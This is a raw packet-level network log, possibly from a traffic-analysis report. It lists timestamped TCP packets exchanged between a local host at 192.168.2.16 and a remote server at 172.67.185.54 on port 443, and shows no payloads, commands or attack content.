                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.189810038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.189851046 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190447092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190478086 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190500975 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190505981 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190529108 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190546036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190869093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190881968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190927982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190932989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.190990925 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191643953 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191673994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191708088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191714048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.191766977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228183985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228219986 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228272915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228305101 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228332043 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228349924 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228698015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228718996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228777885 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228790045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.228837013 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230168104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230186939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230232000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230242968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230268002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230289936 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230554104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230572939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230631113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230643034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230667114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.230685949 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233042955 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233064890 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233114958 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233136892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233181000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233181000 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233196020 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233208895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233256102 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233738899 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233762980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233822107 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233834028 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.233880997 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304749012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304773092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304898977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.304915905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305151939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305577040 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305598974 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305669069 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305680990 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.305737019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306190014 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306210041 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306278944 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306291103 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.306340933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307789087 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307823896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307862043 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307873011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307913065 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.307931900 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308150053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308166027 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308237076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308248997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.308300018 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309010029 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309024096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309094906 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309104919 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309154987 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309684038 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309698105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309762001 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309773922 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.309843063 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310313940 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310328007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310393095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310403109 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310456991 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310714006 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310726881 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310791969 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310802937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.310859919 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346116066 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346131086 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346298933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346312046 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346374989 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346785069 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346800089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346863031 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346873999 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.346929073 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.347778082 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.347793102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.347862959 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.347872972 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.347934008 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.347989082 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348052979 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348061085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348102093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348126888 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348145962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348463058 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348480940 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348543882 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348556042 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.348638058 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.351717949 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.351748943 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.351794958 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.351805925 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.351830006 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.352092981 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.352178097 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.352191925 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.352257013 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.352267981 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.352320910 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423286915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423317909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423388004 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423407078 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423446894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423466921 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423898935 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423918962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.423990965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424002886 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424055099 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424421072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424444914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424488068 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424498081 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424521923 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424567938 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424947977 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.424962044 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425026894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425038099 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425091982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425415993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425427914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425493956 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425504923 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.425550938 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427192926 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427206993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427278042 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427289963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427347898 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427720070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427745104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427789927 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427802086 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427848101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.427848101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428329945 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428352118 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428399086 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428409100 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428437948 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428459883 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428752899 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428770065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428842068 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428853989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.428905964 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.464428902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.464447021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.464519978 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.464539051 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.464598894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465146065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465162039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465229988 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465240955 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465295076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465816021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465832949 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465893984 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465905905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.465954065 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466496944 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466511011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466582060 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466592073 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466645002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466933966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.466948032 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.467008114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.467019081 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.467072010 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470046997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470062971 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470123053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470136881 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470191002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470679045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470693111 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470755100 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470767021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.470834970 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517218113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517247915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517352104 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517364979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.517443895 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542181015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542198896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542279959 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542293072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542352915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542368889 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542387962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542438030 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542448997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542484045 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.542506933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543138981 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543154001 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543224096 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543236017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543288946 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543570995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543584108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543700933 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543713093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.543764114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545270920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545283079 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545355082 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545366049 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545414925 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545809984 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545821905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545886040 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545898914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.545952082 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546308994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546335936 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546377897 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546387911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546418905 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546447039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546870947 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546885014 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546951056 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.546962023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547012091 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547444105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547456980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547528982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547538996 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.547595978 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757183075 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757203102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.757291079 CET49717443192.168.2.16172.67.185.54
